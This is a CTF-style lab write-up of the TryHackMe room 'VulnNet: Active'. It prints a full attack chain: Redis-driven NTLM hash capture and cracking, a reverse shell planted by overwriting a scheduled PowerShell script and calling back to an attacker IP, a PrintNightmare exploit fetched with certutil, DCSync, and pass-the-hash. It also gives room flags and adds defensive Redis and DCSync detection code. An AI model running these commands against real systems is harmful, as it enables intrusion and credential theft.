
VulnNet: Active TryHackMe Walkthrough

5 min read · Aug 16, 2025

TL;DR Walkthrough of the VulnNet: Active TryHackMe room.

THM Walkthroughs:

A full list of our TryHackMe walkthroughs and cheatsheets is here.

Background

I am continuing to do various Windows-focused rooms that don’t have webapps and studying for a Microsoft exam as therapy after taking the PT1 exam. TryHackMe has been having a lot of connection issues lately, which is why you will see the target VM change during this walkthrough. I had to reset it a few times as it would hang and become completely unresponsive.

Enumeration

As always I started out with an nmap scan.

sudo nmap -p1-10000 -Pn -sC -sV -O 10.201.125.206

It looks like a Windows VM, but it’s not showing the information that a DC would normally show. This led me to suspect that we are meant to abuse a random service for initial access.

Redis is running on port 6379. Redis is one of the most popular NoSQL databases. I’m not a ‘DB Guy’, so I hadn’t heard of it. I only recently learned how to automate spinning up and configuring MSSQL so I could integrate it into Mishky’s AD Range.

ChatGPT hooked me up though with a simple way to connect and then elicit an authentication attempt from Redis back to our Kali. This TTP allows us to capture an NTLMv2 which we can then attempt to crack.

Start by running responder on Kali.

sudo responder -I tun0 -dwv

Then connect to Redis and tell it to retrieve a file from Kali. Please note that the file doesn’t have to actually exist.

redis-cli -h 10.201.125.206

CONFIG SET dir \\10.23.20.245\share\fake.dll
CONFIG SET dbfilename test.rdb
SAVE
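The write primitive above (CONFIG SET dir / dbfilename followed by SAVE) is exactly what a defender should be watching for on an exposed Redis. The following is an added example, not code from the post or from the Redis project: it parses a constructed sample of Redis MONITOR output and flags a dir pointing at a UNC share and a CONFIG SET that is quickly followed by SAVE from the same client, and it audits constructed redis.conf fragments for the settings that make this attack possible in the first place. The sample lines, the client port and the config fragments are all constructed for the example.

```python
import re
import shlex

# Constructed sample of Redis MONITOR output (not captured from the room). MONITOR prints
# one line per command: <unix timestamp> [<db> <client ip:port>] "CMD" "arg" ...
# The second line mirrors the walkthrough's CONFIG SET dir pointing at a UNC share.
SAMPLE_MONITOR = r'''1723800000.100001 [0 10.23.20.245:50212] "PING"
1723800000.200002 [0 10.23.20.245:50212] "CONFIG" "SET" "dir" "\\\\10.23.20.245\\share\\fake.dll"
1723800000.300003 [0 10.23.20.245:50212] "CONFIG" "SET" "dbfilename" "test.rdb"
1723800000.400004 [0 10.23.20.245:50212] "SAVE"
1723800001.500005 [0 127.0.0.1:40000] "CONFIG" "SET" "dir" "/var/lib/redis"
'''

MON_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<rest>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')          # one double-quoted, backslash-escaped argument
UNC_RE = re.compile(r'^(\\\\|//)[^\\/]+[\\/]')        # \\host\share or //host/share


def parse_monitor_line(line):
    """Split a MONITOR line into timestamp, client and the unescaped argument list."""
    m = MON_RE.match(line)
    if not m:
        return None
    args = [re.sub(r'\\(.)', r'\1', a) for a in ARG_RE.findall(m.group('rest'))]
    return {'ts': float(m.group('ts')), 'client': m.group('client'), 'args': args}


def detect_suspicious(monitor_text, window=60.0):
    """Return (kind, client, detail) findings: UNC dir targets and CONFIG SET followed by SAVE."""
    findings = []
    pending = {}  # client -> timestamp of its last CONFIG SET dir/dbfilename
    for line in monitor_text.splitlines():
        ev = parse_monitor_line(line)
        if not ev or not ev['args']:
            continue
        cmd = [a.upper() for a in ev['args'][:2]]
        if cmd == ['CONFIG', 'SET'] and len(ev['args']) >= 4:
            key, value = ev['args'][2].lower(), ev['args'][3]
            if key == 'dir' and UNC_RE.match(value):
                findings.append(('unc_dir', ev['client'], value))
            if key in ('dir', 'dbfilename'):
                pending[ev['client']] = ev['ts']
        elif cmd[0] in ('SAVE', 'BGSAVE') and ev['client'] in pending:
            if ev['ts'] - pending.pop(ev['client']) <= window:
                findings.append(('config_then_save', ev['client'], cmd[0]))
    return findings


# Constructed redis.conf fragments: the exposed settings that let an unauthenticated
# network client run CONFIG SET, and a hardened counterpart.
WEAK_CONF = '''bind 0.0.0.0
protected-mode no
port 6379
'''
HARDENED_CONF = '''bind 127.0.0.1 -::1
protected-mode yes
requirepass REPLACE_WITH_LONG_RANDOM_SECRET
rename-command CONFIG ""
'''

LOOPBACK = {'127.0.0.1', '::1', 'localhost'}


def audit_conf(conf_text):
    """Return the names of hardening settings that are missing or weak in a redis.conf."""
    directives = {}
    disabled = set()
    for raw in conf_text.splitlines():
        parts = shlex.split(raw.split('#', 1)[0])
        if not parts:
            continue
        if parts[0].lower() == 'rename-command' and len(parts) == 3 and parts[2] == '':
            disabled.add(parts[1].upper())      # rename-command X "" disables the command
        else:
            directives[parts[0].lower()] = parts[1:]
    issues = []
    binds = [b.lstrip('-') for b in directives.get('bind', ['0.0.0.0'])]
    if not all(b in LOOPBACK for b in binds):
        issues.append('bind')
    if directives.get('protected-mode', ['yes'])[0].lower() != 'yes':
        issues.append('protected-mode')
    if not directives.get('requirepass'):
        issues.append('requirepass')
    if 'CONFIG' not in disabled:
        issues.append('rename-command CONFIG')
    return issues


if __name__ == '__main__':
    for finding in detect_suspicious(SAMPLE_MONITOR):
        print('ALERT', finding)
    print('weak conf issues:', audit_conf(WEAK_CONF))
    print('hardened conf issues:', audit_conf(HARDENED_CONF))
```

MONITOR is expensive on a busy instance, so in practice the same parser would be pointed at a short capture or at a proxy log; the config audit is the cheaper control, since an instance bound to loopback with a password and CONFIG disabled offers nothing to the redis-cli sequence in the walkthrough.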

I then captured an authentication attempt with responder.

enterprise-security::VULNNET:26e904fdb362d...

I copy/pasted the hash into VulnNet.txt and ran rockyou against it with john.

john VulnNet.txt --wordlist=/home/kali/rockyou.txt

I got:

sand_0873959498 (enterprise-security)


Initial Access

Nice, we have legitimate credentials now. We can run authenticated enumeration with enum4linux and look for interesting share drives, usernames, groups, etc.

enum4linux -u enterprise-security -p 'sand_0873959498' -a 10.201.21.137
smbclient //10.201.34.232/Enterprise-Share -U 'enterprise-security'

There’s only one file there, a PS1 containing:

rm -Force C:\Users\Public\Documents\* -ErrorAction SilentlyContinue

I made the bold assumption that there is a scheduled task running this PS1. Hence I created a file on Kali named ‘PurgeIrrelevantData_1826.ps1’ and copy/pasted Invoke-PowerShellTcp.ps1 into it. You can grab a copy here. I then added one line at the bottom that will run the function defined in Invoke-PowerShellTcp and establish a reverse shell back to Kali.

Invoke-PowerShellTcp -Reverse -IPAddress 10.23.20.245 -Port 443

I started a listener on Kali.

nc -lvnp 443

I then uploaded the PS1 to the target VM using smbclient. This overwrites the existing file by default with our copy.

put PurgeIrrelevantData_1826.ps1

On a sidenote, I didn’t get a reverse shell with ChatGPT’s oneliner, I had to use Invoke-PowerShellTcp. CRTP for the win, Invoke-PowerShellTcp.ps1 was one of the tools Altered Security stressed in that course and exam.

I caught a shell as vulnnet\enterprise-security.

Privilege Escalation

I went out on another limb here; I simply assumed the VM was vulnerable to the PrintSpooler bug and tried that. It didn’t work, so I tried PrintNightmare next. These were massive bugs in Windows recently after all, and CTF type VMs tend to use them.

I grabbed a copy of CVE-2021-1675.ps1 from here and hosted it on Kali using the simple HTTP server.

python3 -m http.server 80

Download it to the target Windows VM using that reverse shell we got, import it, and run it.

certutil -urlcache -split -f http://10.23.20.245/CVE-2021-1675.ps1 C:\Users\enterprise-security\Downloads\CVE-2021-1675.ps1
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare

This adds user `adm1n`/`P@ssw0rd` in the local admin group by default according to the author’s GitHub. I found in practice that if the target VM is a DC then it adds that user to the Administrators group in AD.

Post Compromise

Astute readers likely know where I am going next. After all, we know what groups in AD can DCSync by default:

  • Administrators
  • Domain Admins
  • Enterprise Admins
  • Domain Controllers
  • NT AUTHORITY\SYSTEM

We have an account in the Administrators group now, let’s DCSync!

/usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc adm1n:P\@ssw0rd@10.201.34.232
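From the blue-team side, the DCSync above is what Windows Security event 4662 on the DC records: an access check for the directory replication control-access rights against the domain object. The following is an added example, not code from the post or from any tool it uses: it evaluates constructed, pre-parsed 4662 records the way a SIEM rule would, flagging replication rights requested by any principal that is not a known domain controller account or an allowlisted sync account. The DC account name VULNNET-DC$, the MSOL_ prefix used for the allowlist and the event records themselves are constructed; the three rights GUIDs are Microsoft's published extended-rights GUIDs.

```python
import re

# Extended-rights GUIDs for directory replication, as published in Microsoft's AD schema docs.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS bit in the 4662 AccessMask

GUID_RE = re.compile(r'\{?([0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12})\}?', re.I)

# Constructed 4662 records (field names follow the event's XML data items). A real DC would
# emit the first shape for legitimate replication by a peer DC; the second mirrors the
# secretsdump run in the walkthrough.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "VULNNET-DC$", "SubjectDomainName": "VULNNET",
     "ObjectType": "domainDNS", "ObjectName": "DC=vulnnet,DC=local", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "adm1n", "SubjectDomainName": "VULNNET",
     "ObjectType": "domainDNS", "ObjectName": "DC=vulnnet,DC=local", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "MSOL_0123456789ab", "SubjectDomainName": "VULNNET",
     "ObjectType": "domainDNS", "ObjectName": "DC=vulnnet,DC=local", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "enterprise-security", "SubjectDomainName": "VULNNET",
     "ObjectType": "user", "ObjectName": "CN=someone,CN=Users,DC=vulnnet,DC=local",
     "AccessMask": "0x20", "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def replication_rights_in(event):
    """Names of the replication extended rights listed in the event's Properties field."""
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)


def flag_dcsync(events, dc_accounts, allowlist=()):
    """Return alerts for replication-rights access checks by principals that are not DCs.

    dc_accounts: SAM names of the domain's DC computer accounts (trailing $ included).
    allowlist: name prefixes of accounts expected to replicate (e.g. directory sync services).
    """
    known_dcs = {a.upper() for a in dc_accounts}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        if int(ev.get("AccessMask", "0"), 16) & CONTROL_ACCESS == 0:
            continue  # not a control-access check, so not a replication request
        rights = replication_rights_in(ev)
        if not rights:
            continue
        who = ev["SubjectUserName"]
        if who.upper() in known_dcs:
            continue
        if any(who.upper().startswith(p.upper()) for p in allowlist):
            continue
        alerts.append({
            "account": f'{ev["SubjectDomainName"]}\\{who}',
            "rights": rights,
            "object": ev.get("ObjectName", ""),
        })
    return alerts


if __name__ == "__main__":
    for alert in flag_dcsync(SAMPLE_EVENTS, dc_accounts=["VULNNET-DC$"], allowlist=["MSOL_"]):
        print("DCSync suspected:", alert)
```

The allowlist is the part that needs care in a real environment: directory synchronisation services legitimately hold these rights, so the rule keys on an explicit inventory of DC accounts and sync accounts rather than on group membership, which is exactly what the walkthrough just changed by adding a new user to Administrators.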

I tried to use the Administrator’s NTLM and WinRM to access the VM.

evil-winrm -i 10.201.34.232 -u Administrator -H 85d1fadbe37887ed63987f822acb47f1

However, the VM was janky, or TryHackMe was being too slow and timing out. Either way, I couldn’t get evil-winrm to connect even though WinRM was enabled.

I ended up just using wmiexec.

/usr/share/doc/python3-impacket/examples/wmiexec.py vulnnet.local/administrator@10.201.34.232 -hashes aad3b435b51404eeaad3b435b51404ee:85d1fadbe37887ed63987f822acb47f1

C:\Users\Administrator\Desktop>type system.txt
THM{d540c0645975900e5bb9167aa431fc9b}

C:\Users\enterprise-security\Desktop>type user.txt
THM{3eb176aee96432d5b100bc93580b291e}

Room Q&A

What is the user flag? (Desktop\user.txt)

THM{3eb176aee96432d5b100bc93580b291e}

What is the system flag? (Desktop\system.txt)

THM{d540c0645975900e5bb9167aa431fc9b}

Summary

On a sidenote, I took a look at startup.bat while I was poking around in the VM. It’s what’s running the PS1 file that we are meant to find and modify.

:home
TIMEOUT /T 30 /NOBREAK
powershell.exe -File C:\Enterprise-Share\PurgeIrrelevantData_1826.ps1
TIMEOUT /T 30
cls
Goto :home

I wasn’t really a ‘Windows Guy’ until after PowerShell debuted, but I Googled and found that essentially this waits 30 seconds, runs the PS1, waits 30 seconds, and then repeats the entire bat file. It’s a loop that runs the specified PS1 every minute.

Overall this wasn’t a bad room. The VM is a DC for the domain vulnnet.local, but it doesn’t act like one. The room’s author decided to block connections to the common ports that a DC uses and have us attack it like it was a standalone Windows VM. Essentially we abused a misconfigured service [Redis] to gain credentials, abused a writable PS1 on a share drive to get a reverse shell, and then abused an unpatched vulnerability to escalate privileges locally. There was no AD involved. In that sense it was much like the “AD Pentest” portion of the PT1 exam, so it was good practice for that.

References

Redis: https://en.wikipedia.org/wiki/Redis

Invoke-PowerShellTcp: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

PrintNightmare: https://github.com/calebstewart/CVE-2021-1675

Written by Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from auditing or the lab.
